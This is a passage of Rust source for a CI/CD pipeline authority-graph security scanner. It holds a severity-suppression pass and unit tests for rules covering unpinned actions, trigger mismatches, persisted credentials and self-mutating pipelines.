any_authority_step_seen = true;
let guarded = step
.metadata
.get(META_FORK_CHECK)
.map(|v| v == "true")
.unwrap_or(false);
if !guarded {
all_authority_steps_have_fork_check = false;
}
}
let fork_check_universal = any_authority_step_seen && all_authority_steps_have_fork_check;
// For Suppression 1, build per-job: does any step in the job have
// access to a Secret/Identity OR write to the env gate?
use std::collections::{BTreeMap, BTreeSet};
let mut job_has_privileged_step: BTreeMap<String, bool> = BTreeMap::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let job = match step.metadata.get(META_JOB_NAME) {
Some(j) => j.clone(),
None => continue,
};
let privileged = graph.edges_from(step.id).any(|e| {
e.kind == EdgeKind::HasAccessTo
&& graph
.node(e.to)
.map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
.unwrap_or(false)
}) || step
.metadata
.get(META_WRITES_ENV_GATE)
.map(|v| v == "true")
.unwrap_or(false);
let entry = job_has_privileged_step.entry(job).or_insert(false);
if privileged {
*entry = true;
}
}
// For Suppression 3 — over_privileged_identity — collect the names of
// narrower per-job identity overrides so we can credit them when the
// broad workflow-level identity fires.
let job_level_narrow_overrides: BTreeSet<String> = graph
.nodes_of_kind(NodeKind::Identity)
.filter(|n| {
n.name.starts_with("GITHUB_TOKEN (")
&& n.metadata
.get(META_IDENTITY_SCOPE)
.map(|s| s == "constrained")
.unwrap_or(false)
})
.map(|n| n.name.clone())
.collect();
for finding in findings.iter_mut() {
match finding.category {
// ── Suppression 1: checkout_self_pr_exposure
FindingCategory::CheckoutSelfPrExposure => {
// Identify the checkout step (first node in nodes_involved)
// and look up its job. If the job has no privileged steps,
// the checkout is read-only — downgrade to Info.
let job = finding
.nodes_involved
.first()
.and_then(|id| graph.node(*id))
.and_then(|n| n.metadata.get(META_JOB_NAME).cloned());
let job_privileged = job
.as_ref()
.and_then(|j| job_has_privileged_step.get(j).copied())
.unwrap_or(true); // unknown → conservative: keep High
if !job_privileged {
finding.severity = Severity::Info;
finding.message.push_str(
" (downgraded: no privileged steps in same job — \
checkout is read-only for lint/test/analysis)",
);
}
}
// ── Suppression 2: trigger_context_mismatch
FindingCategory::TriggerContextMismatch => {
if fork_check_universal {
// Critical → Medium (not Info — the trigger choice itself
// is still risky enough to keep visible for audit).
finding.severity = match finding.severity {
Severity::Critical => Severity::Medium,
s => downgrade_one_step(s),
};
finding.message.push_str(
" (downgraded: every privileged job in this workflow carries the \
standard fork-check `if:` — fork PRs cannot reach the privileged steps)",
);
}
}
// ── Suppression 3: over_privileged_identity
FindingCategory::OverPrivilegedIdentity => {
// Only relevant when the firing identity IS the
// workflow-level GITHUB_TOKEN AND at least one job has its
// own narrower override.
let firing_node_name = finding
.nodes_involved
.first()
.and_then(|id| graph.node(*id))
.map(|n| n.name.clone());
let is_workflow_level_token = firing_node_name.as_deref() == Some("GITHUB_TOKEN");
if is_workflow_level_token && !job_level_narrow_overrides.is_empty() {
// Suppress by reducing to Info — the runtime identity
// any job actually uses is the narrower job-level one.
finding.severity = Severity::Info;
let mut narrower: Vec<&str> = job_level_narrow_overrides
.iter()
.map(|s| s.as_str())
.collect();
narrower.sort_unstable();
finding.message.push_str(&format!(
" (suppressed: job-level permissions narrow this scope at runtime — \
see {})",
narrower.join(", ")
));
}
}
// ── Suppression 4: terraform_auto_approve_in_prod
//
// The pre-existing rule already early-skipped
// env-gated steps, so it never emits a finding to downgrade.
// Downgrade is wired into the rule body itself (search for
// `env_gated`) — kept as a no-op match arm here so future
// contributors can find the suppression-pass alongside the
// others.
FindingCategory::TerraformAutoApproveInProd => { /* see rule body */ }
_ => {}
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::graph::*;
fn source(file: &str) -> PipelineSource {
PipelineSource {
file: file.into(),
repo: None,
git_ref: None,
commit_sha: None,
}
}
#[test]
fn unpinned_third_party_action_flagged() {
let mut g = AuthorityGraph::new(source("ci.yml"));
g.add_node(
NodeKind::Image,
"actions/checkout@v4",
TrustZone::ThirdParty,
);
let findings = unpinned_action(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
}
#[test]
fn pinned_action_not_flagged() {
let mut g = AuthorityGraph::new(source("ci.yml"));
g.add_node(
NodeKind::Image,
"actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29",
TrustZone::ThirdParty,
);
let findings = unpinned_action(&g);
assert!(findings.is_empty());
}
#[test]
fn untrusted_step_with_secret_is_critical() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let step = g.add_node(NodeKind::Step, "evil-action", TrustZone::Untrusted);
let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
let findings = untrusted_with_authority(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Critical);
}
#[test]
fn implicit_identity_downgrades_to_info() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let step = g.add_node(NodeKind::Step, "AzureCLI@2", TrustZone::Untrusted);
let mut meta = std::collections::HashMap::new();
meta.insert(META_IMPLICIT.into(), "true".into());
meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
let token = g.add_node_with_metadata(
NodeKind::Identity,
"System.AccessToken",
TrustZone::FirstParty,
meta,
);
g.add_edge(step, token, EdgeKind::HasAccessTo);
let findings = untrusted_with_authority(&g);
assert_eq!(findings.len(), 1);
assert_eq!(
findings[0].severity,
Severity::Info,
"implicit token must be Info not Critical"
);
assert!(findings[0].message.contains("platform-injected"));
}
#[test]
fn explicit_secret_remains_critical_despite_implicit_token() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let step = g.add_node(NodeKind::Step, "AzureCLI@2", TrustZone::Untrusted);
// implicit token → Info
let mut meta = std::collections::HashMap::new();
meta.insert(META_IMPLICIT.into(), "true".into());
let token = g.add_node_with_metadata(
NodeKind::Identity,
"System.AccessToken",
TrustZone::FirstParty,
meta,
);
// explicit secret → Critical
let secret = g.add_node(NodeKind::Secret, "ARM_CLIENT_SECRET", TrustZone::FirstParty);
g.add_edge(step, token, EdgeKind::HasAccessTo);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
let findings = untrusted_with_authority(&g);
assert_eq!(findings.len(), 2);
let info = findings
.iter()
.find(|f| f.severity == Severity::Info)
.unwrap();
let crit = findings
.iter()
.find(|f| f.severity == Severity::Critical)
.unwrap();
assert!(info.message.contains("platform-injected"));
assert!(crit.message.contains("ARM_CLIENT_SECRET"));
}
#[test]
fn artifact_crossing_detected() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let secret = g.add_node(NodeKind::Secret, "KEY", TrustZone::FirstParty);
let build = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::FirstParty);
let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::ThirdParty);
g.add_edge(build, secret, EdgeKind::HasAccessTo);
g.add_edge(build, artifact, EdgeKind::Produces);
g.add_edge(artifact, deploy, EdgeKind::Consumes);
let findings = artifact_boundary_crossing(&g);
assert_eq!(findings.len(), 1);
assert_eq!(
findings[0].category,
FindingCategory::ArtifactBoundaryCrossing
);
}
#[test]
fn propagation_to_sha_pinned_is_high_not_critical() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(
"digest".into(),
"a5ac7e51b41094c92402da3b24376905380afc29".into(),
);
let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
let step = g.add_node(NodeKind::Step, "checkout", TrustZone::ThirdParty);
let image = g.add_node_with_metadata(
NodeKind::Image,
"actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29",
TrustZone::ThirdParty,
meta,
);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
g.add_edge(step, image, EdgeKind::UsesImage);
let findings = authority_propagation(&g, 4);
// Should find propagation to the SHA-pinned image
let image_findings: Vec<_> = findings
.iter()
.filter(|f| f.nodes_involved.contains(&image))
.collect();
assert!(!image_findings.is_empty());
// SHA-pinned targets get High, not Critical (non-OIDC source)
assert_eq!(image_findings[0].severity, Severity::High);
}
#[test]
fn oidc_identity_to_pinned_third_party_is_critical() {
let mut g = AuthorityGraph::new(source("ci.yml"));
// OIDC-federated cloud identity — token itself is the threat
let mut id_meta = std::collections::HashMap::new();
id_meta.insert(META_OIDC.into(), "true".into());
let identity = g.add_node_with_metadata(
NodeKind::Identity,
"AWS_OIDC_ROLE",
TrustZone::FirstParty,
id_meta,
);
// SHA-pinned ThirdParty image — would normally be High without OIDC
let mut img_meta = std::collections::HashMap::new();
img_meta.insert(
META_DIGEST.into(),
"a5ac7e51b41094c92402da3b24376905380afc29".into(),
);
let image = g.add_node_with_metadata(
NodeKind::Image,
"aws-actions/configure-aws-credentials@a5ac7e51b41094c92402da3b24376905380afc29",
TrustZone::ThirdParty,
img_meta,
);
// Step in ThirdParty zone holds the OIDC identity and uses the pinned image
let step = g.add_node(
NodeKind::Step,
"configure-aws-credentials",
TrustZone::ThirdParty,
);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
g.add_edge(step, image, EdgeKind::UsesImage);
let findings = authority_propagation(&g, 4);
let image_findings: Vec<_> = findings
.iter()
.filter(|f| f.nodes_involved.contains(&image))
.collect();
assert!(
!image_findings.is_empty(),
"expected OIDC→pinned propagation finding"
);
// OIDC source escalates pinned ThirdParty from High → Critical
assert_eq!(image_findings[0].severity, Severity::Critical);
}
#[test]
fn propagation_to_untrusted_is_critical() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
g.add_edge(step, image, EdgeKind::UsesImage);
let findings = authority_propagation(&g, 4);
let image_findings: Vec<_> = findings
.iter()
.filter(|f| f.nodes_involved.contains(&image))
.collect();
assert!(!image_findings.is_empty());
assert_eq!(image_findings[0].severity, Severity::Critical);
}
#[test]
fn long_lived_credential_detected() {
let mut g = AuthorityGraph::new(source("ci.yml"));
g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
g.add_node(NodeKind::Secret, "NPM_TOKEN", TrustZone::FirstParty);
g.add_node(NodeKind::Secret, "DEPLOY_API_KEY", TrustZone::FirstParty);
// Non-matching names
g.add_node(NodeKind::Secret, "CACHE_TTL", TrustZone::FirstParty);
let findings = long_lived_credential(&g);
assert_eq!(findings.len(), 2); // AWS_ACCESS_KEY_ID + DEPLOY_API_KEY
assert!(findings
.iter()
.all(|f| f.category == FindingCategory::LongLivedCredential));
}
#[test]
fn duplicate_unpinned_actions_deduplicated() {
let mut g = AuthorityGraph::new(source("ci.yml"));
// Same action used in two jobs — two Image nodes, same name
g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
g.add_node(
NodeKind::Image,
"actions/setup-node@v3",
TrustZone::Untrusted,
);
let findings = unpinned_action(&g);
// Should get 2 findings (checkout + setup-node), not 3
assert_eq!(findings.len(), 2);
}
#[test]
fn broad_identity_scope_flagged_as_high() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_PERMISSIONS.into(), "write-all".into());
meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
let identity = g.add_node_with_metadata(
NodeKind::Identity,
"GITHUB_TOKEN",
TrustZone::FirstParty,
meta,
);
let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
let findings = over_privileged_identity(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::High);
assert!(findings[0].message.contains("broad"));
}
#[test]
fn unknown_identity_scope_flagged_as_medium() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_PERMISSIONS.into(), "custom-scope".into());
meta.insert(META_IDENTITY_SCOPE.into(), "unknown".into());
let identity = g.add_node_with_metadata(
NodeKind::Identity,
"GITHUB_TOKEN",
TrustZone::FirstParty,
meta,
);
let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
let findings = over_privileged_identity(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Medium);
assert!(findings[0].message.contains("unknown"));
}
#[test]
fn floating_image_unpinned_container_flagged() {
    // A tag-only (no digest) container image is a Medium FloatingImage.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let container_meta =
        std::collections::HashMap::from([(META_CONTAINER.into(), "true".into())]);
    graph.add_node_with_metadata(NodeKind::Image, "ubuntu:22.04", TrustZone::Untrusted, container_meta);
    let findings = floating_image(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.category, FindingCategory::FloatingImage);
    assert_eq!(finding.severity, Severity::Medium);
}
#[test]
fn partial_graph_caps_critical_findings_at_high() {
    // A graph marked Partial still fires its rules, but every finding is
    // capped at High — nothing may surface as Critical.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    graph.mark_partial("matrix strategy hides some authority paths");
    let token = graph.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
    let deploy = graph.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
    let action = graph.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
    graph.add_edge(deploy, token, EdgeKind::HasAccessTo);
    graph.add_edge(deploy, action, EdgeKind::UsesImage);
    let findings = run_all_rules(&graph, 4);
    let fired = |cat: FindingCategory| findings.iter().any(|f| f.category == cat);
    assert!(fired(FindingCategory::AuthorityPropagation));
    assert!(fired(FindingCategory::UntrustedWithAuthority));
    assert!(findings.iter().all(|f| f.severity >= Severity::High));
    assert!(!findings.iter().any(|f| f.severity == Severity::Critical));
}
#[test]
fn complete_graph_keeps_critical_findings() {
    // Same graph shape as the partial-cap test, but without mark_partial:
    // the Critical severity must survive uncapped.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let token = graph.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
    let deploy = graph.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
    let action = graph.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
    graph.add_edge(deploy, token, EdgeKind::HasAccessTo);
    graph.add_edge(deploy, action, EdgeKind::UsesImage);
    assert!(run_all_rules(&graph, 4)
        .iter()
        .any(|f| f.severity == Severity::Critical));
}
#[test]
fn floating_image_digest_pinned_container_not_flagged() {
    // A container pinned by sha256 digest is immutable — no finding.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let container_meta =
        std::collections::HashMap::from([(META_CONTAINER.into(), "true".into())]);
    graph.add_node_with_metadata(
        NodeKind::Image,
        "ubuntu@sha256:a5ac7e51b41094c92402da3b24376905380afc29a5ac7e51b41094c92402da3b",
        TrustZone::ThirdParty,
        container_meta,
    );
    assert!(
        floating_image(&graph).is_empty(),
        "digest-pinned container should not be flagged"
    );
}
#[test]
fn unpinned_action_does_not_flag_container_images() {
    // Regression: container Image nodes are handled by floating_image, not unpinned_action.
    // The same node must not generate findings from both rules.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let container_meta =
        std::collections::HashMap::from([(META_CONTAINER.into(), "true".into())]);
    graph.add_node_with_metadata(NodeKind::Image, "ubuntu:22.04", TrustZone::Untrusted, container_meta);
    assert!(
        unpinned_action(&graph).is_empty(),
        "unpinned_action must skip container images to avoid double-flagging"
    );
}
#[test]
fn floating_image_ignores_action_images() {
    // An Image node without META_CONTAINER represents a step `uses:`
    // action, which belongs to unpinned_action — floating_image skips it.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    graph.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
    assert!(
        floating_image(&graph).is_empty(),
        "floating_image should not flag step actions"
    );
}
#[test]
fn persisted_credential_rule_fires_on_persists_to_edge() {
    // A PersistsTo edge (ADO persistCredentials) from a step to an
    // identity must raise exactly one High PersistedCredential finding.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let access_token = graph.add_node(NodeKind::Identity, "System.AccessToken", TrustZone::FirstParty);
    let checkout_step = graph.add_node(NodeKind::Step, "checkout", TrustZone::FirstParty);
    graph.add_edge(checkout_step, access_token, EdgeKind::PersistsTo);
    let findings = persisted_credential(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.category, FindingCategory::PersistedCredential);
    assert_eq!(finding.severity, Severity::High);
    assert!(finding.message.contains("persistCredentials"));
}
#[test]
fn untrusted_with_cli_flag_exposed_secret_notes_log_exposure() {
    // A secret tagged as passed via a CLI flag must yield a message that
    // calls out -var flag log exposure, with a Manual recommendation.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let tf_step = graph.add_node(NodeKind::Step, "TerraformCLI@0", TrustZone::Untrusted);
    let flag_meta =
        std::collections::HashMap::from([(META_CLI_FLAG_EXPOSED.into(), "true".into())]);
    let password =
        graph.add_node_with_metadata(NodeKind::Secret, "db_password", TrustZone::FirstParty, flag_meta);
    graph.add_edge(tf_step, password, EdgeKind::HasAccessTo);
    let findings = untrusted_with_authority(&graph);
    assert_eq!(findings.len(), 1);
    assert!(
        findings[0].message.contains("-var flag"),
        "message should note -var flag log exposure"
    );
    assert!(matches!(
        findings[0].recommendation,
        Recommendation::Manual { .. }
    ));
}
#[test]
fn constrained_identity_scope_not_flagged() {
    // An identity explicitly classified "constrained" is least-privilege
    // already — the over-privilege rule must stay silent.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let token = graph.add_node_with_metadata(
        NodeKind::Identity,
        "GITHUB_TOKEN",
        TrustZone::FirstParty,
        std::collections::HashMap::from([
            (META_PERMISSIONS.into(), "{ contents: read }".into()),
            (META_IDENTITY_SCOPE.into(), "constrained".into()),
        ]),
    );
    let build = graph.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
    graph.add_edge(build, token, EdgeKind::HasAccessTo);
    assert!(
        over_privileged_identity(&graph).is_empty(),
        "constrained scope should not be flagged"
    );
}
#[test]
fn trigger_context_mismatch_fires_on_pull_request_target_with_secret() {
    // pull_request_target plus a secret-holding step is the classic
    // GitHub pwn-request shape → Critical TriggerContextMismatch.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    graph
        .metadata
        .insert(META_TRIGGER.into(), "pull_request_target".into());
    let key = graph.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
    let build = graph.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
    graph.add_edge(build, key, EdgeKind::HasAccessTo);
    let findings = trigger_context_mismatch(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::Critical);
    assert_eq!(finding.category, FindingCategory::TriggerContextMismatch);
}
#[test]
fn trigger_context_mismatch_no_fire_without_trigger_metadata() {
    // Without META_TRIGGER on the graph there is no trigger context to
    // mismatch — the rule must stay silent.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let key = graph.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
    let build = graph.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
    graph.add_edge(build, key, EdgeKind::HasAccessTo);
    assert!(
        trigger_context_mismatch(&graph).is_empty(),
        "no trigger metadata → no finding"
    );
}
#[test]
fn cross_workflow_authority_chain_detected() {
    // A secret-holding step delegating to an Untrusted external workflow
    // is a Critical cross-workflow authority chain.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let deploy = graph.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
    let key = graph.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
    let external_wf = graph.add_node(NodeKind::Image, "evil/workflow.yml@main", TrustZone::Untrusted);
    graph.add_edge(deploy, key, EdgeKind::HasAccessTo);
    graph.add_edge(deploy, external_wf, EdgeKind::DelegatesTo);
    let findings = cross_workflow_authority_chain(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::Critical);
    assert_eq!(finding.category, FindingCategory::CrossWorkflowAuthorityChain);
}
#[test]
fn cross_workflow_authority_chain_no_fire_if_local_delegation() {
    // Delegation to a FirstParty local action stays inside the trust
    // boundary — no cross-workflow chain.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let deploy = graph.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
    let key = graph.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
    let local_action = graph.add_node(NodeKind::Image, "./local-action", TrustZone::FirstParty);
    graph.add_edge(deploy, key, EdgeKind::HasAccessTo);
    graph.add_edge(deploy, local_action, EdgeKind::DelegatesTo);
    assert!(
        cross_workflow_authority_chain(&graph).is_empty(),
        "FirstParty delegation should not be flagged"
    );
}
#[test]
fn authority_cycle_detected() {
    // A two-node delegation loop (A ↔ B) must raise one High AuthorityCycle.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let first = graph.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
    let second = graph.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
    graph.add_edge(first, second, EdgeKind::DelegatesTo);
    graph.add_edge(second, first, EdgeKind::DelegatesTo);
    let findings = authority_cycle(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.category, FindingCategory::AuthorityCycle);
    assert_eq!(finding.severity, Severity::High);
}
#[test]
fn authority_cycle_no_fire_for_acyclic_graph() {
    // A straight delegation chain A → B → C has no cycle to report.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let chain = ["A", "B", "C"].map(|label| graph.add_node(NodeKind::Step, label, TrustZone::FirstParty));
    for link in chain.windows(2) {
        graph.add_edge(link[0], link[1], EdgeKind::DelegatesTo);
    }
    assert!(authority_cycle(&graph).is_empty(), "acyclic graph must not fire");
}
#[test]
fn uplift_without_attestation_fires_when_oidc_no_attests() {
    // An OIDC-federated identity used without any attesting step yields
    // an Info-level UpliftWithoutAttestation nudge.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let role = graph.add_node_with_metadata(
        NodeKind::Identity,
        "AWS/deploy-role",
        TrustZone::FirstParty,
        std::collections::HashMap::from([(META_OIDC.into(), "true".into())]),
    );
    let build = graph.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
    graph.add_edge(build, role, EdgeKind::HasAccessTo);
    let findings = uplift_without_attestation(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::Info);
    assert_eq!(finding.category, FindingCategory::UpliftWithoutAttestation);
}
#[test]
fn uplift_without_attestation_no_fire_when_attests_present() {
    // An OIDC identity is exempt from the uplift rule when some step in
    // the graph carries META_ATTESTS.
    let mut g = AuthorityGraph::new(source("ci.yml"));
    let mut id_meta = std::collections::HashMap::new();
    id_meta.insert(META_OIDC.into(), "true".into());
    let identity = g.add_node_with_metadata(
        NodeKind::Identity,
        "AWS/deploy-role",
        TrustZone::FirstParty,
        id_meta,
    );
    let mut step_meta = std::collections::HashMap::new();
    step_meta.insert(META_ATTESTS.into(), "true".into());
    // The attesting step only needs to exist in the graph; its NodeId is
    // never used, so the return value is dropped (as sibling tests do)
    // instead of the previous bind-then-`let _ = …` workaround.
    g.add_node_with_metadata(NodeKind::Step, "attest", TrustZone::FirstParty, step_meta);
    let build_step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
    g.add_edge(build_step, identity, EdgeKind::HasAccessTo);
    let findings = uplift_without_attestation(&g);
    assert!(findings.is_empty(), "attestation present → no finding");
}
#[test]
fn uplift_without_attestation_no_fire_without_oidc() {
    // The uplift rule is scoped to OIDC-federated identities; a merely
    // broad token (no META_OIDC) belongs to over_privileged_identity.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let token = graph.add_node_with_metadata(
        NodeKind::Identity,
        "GITHUB_TOKEN",
        TrustZone::FirstParty,
        std::collections::HashMap::from([
            (META_PERMISSIONS.into(), "write-all".into()),
            (META_IDENTITY_SCOPE.into(), "broad".into()),
        ]),
    );
    let build = graph.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
    graph.add_edge(build, token, EdgeKind::HasAccessTo);
    assert!(
        uplift_without_attestation(&graph).is_empty(),
        "broad identity without OIDC must not fire"
    );
}
#[test]
fn self_mutating_pipeline_untrusted_is_critical() {
    // An Untrusted step writing the environment gate is the worst case:
    // attacker-controlled code mutating the pipeline's own guard → Critical.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let gate_meta =
        std::collections::HashMap::from([(META_WRITES_ENV_GATE.into(), "true".into())]);
    graph.add_node_with_metadata(NodeKind::Step, "fork-step", TrustZone::Untrusted, gate_meta);
    let findings = self_mutating_pipeline(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::Critical);
    assert_eq!(finding.category, FindingCategory::SelfMutatingPipeline);
}
#[test]
fn self_mutating_pipeline_privileged_step_is_high() {
    // A FirstParty gate-writer that also holds a secret is High: trusted
    // code, but privileged self-mutation.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let gate_meta =
        std::collections::HashMap::from([(META_WRITES_ENV_GATE.into(), "true".into())]);
    let build =
        graph.add_node_with_metadata(NodeKind::Step, "build", TrustZone::FirstParty, gate_meta);
    let key = graph.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
    graph.add_edge(build, key, EdgeKind::HasAccessTo);
    let findings = self_mutating_pipeline(&graph);
    assert_eq!(findings.len(), 1);
    assert_eq!(findings[0].severity, Severity::High);
}
#[test]
fn trigger_context_mismatch_fires_on_ado_pr_with_secret_as_high() {
    // The ADO "pr" trigger with a secret-holding step fires at High
    // (one step below the GitHub pull_request_target case).
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    graph.metadata.insert(META_TRIGGER.into(), "pr".into());
    let key = graph.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
    let build = graph.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
    graph.add_edge(build, key, EdgeKind::HasAccessTo);
    let findings = trigger_context_mismatch(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::High);
    assert_eq!(finding.category, FindingCategory::TriggerContextMismatch);
}
#[test]
fn cross_workflow_authority_chain_third_party_is_high() {
    // Delegation to a SHA-pinned ThirdParty external workflow is High;
    // Critical is reserved for Untrusted targets.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let deploy = graph.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
    let key = graph.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
    let pinned_workflow = graph.add_node(
        NodeKind::Image,
        "org/repo/.github/workflows/deploy.yml@a5ac7e51b41094c92402da3b24376905380afc29",
        TrustZone::ThirdParty,
    );
    graph.add_edge(deploy, key, EdgeKind::HasAccessTo);
    graph.add_edge(deploy, pinned_workflow, EdgeKind::DelegatesTo);
    let findings = cross_workflow_authority_chain(&graph);
    assert_eq!(findings.len(), 1);
    assert_eq!(
        findings[0].severity,
        Severity::High,
        "ThirdParty delegation target should be High (Critical reserved for Untrusted)"
    );
    assert_eq!(findings[0].category, FindingCategory::CrossWorkflowAuthorityChain);
}
#[test]
fn self_mutating_pipeline_first_party_no_authority_is_medium() {
    // A FirstParty gate-writer with no secret/identity access is the
    // mildest self-mutation shape → Medium.
    let mut graph = AuthorityGraph::new(source("ci.yml"));
    let gate_meta =
        std::collections::HashMap::from([(META_WRITES_ENV_GATE.into(), "true".into())]);
    graph.add_node_with_metadata(NodeKind::Step, "set-version", TrustZone::FirstParty, gate_meta);
    let findings = self_mutating_pipeline(&graph);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::Medium);
    assert_eq!(finding.category, FindingCategory::SelfMutatingPipeline);
}
#[test]
fn authority_cycle_3node_cycle_includes_all_members() {
    // A → B → C → A should produce one finding whose nodes_involved
    // contains all three node IDs, not just the back-edge endpoints.
    let mut graph = AuthorityGraph::new(source("test.yml"));
    let a = graph.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
    let b = graph.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
    let c = graph.add_node(NodeKind::Step, "C", TrustZone::FirstParty);
    for (from, to) in [(a, b), (b, c), (c, a)] {
        graph.add_edge(from, to, EdgeKind::DelegatesTo);
    }
    let findings = authority_cycle(&graph);
    assert_eq!(findings.len(), 1);
    assert_eq!(findings[0].category, FindingCategory::AuthorityCycle);
    assert!(
        findings[0].nodes_involved.contains(&a),
        "A must be in nodes_involved"
    );
    assert!(
        findings[0].nodes_involved.contains(&b),
        "B must be in nodes_involved — middle of A→B→C→A cycle"
    );
    assert!(
        findings[0].nodes_involved.contains(&c),
        "C must be in nodes_involved"
    );
}
#[test]
fn variable_group_in_pr_job_fires_on_pr_trigger_with_var_group() {
    // PR trigger + a variable-group-backed secret reachable from a step
    // → Critical, and the group name must appear in the message.
    let mut graph = AuthorityGraph::new(source("azure-pipelines.yml"));
    graph.metadata.insert(META_TRIGGER.into(), "pr".into());
    let vg_meta =
        std::collections::HashMap::from([(META_VARIABLE_GROUP.into(), "true".into())]);
    let vg_secret = graph.add_node_with_metadata(
        NodeKind::Secret,
        "prod-deploy-secrets",
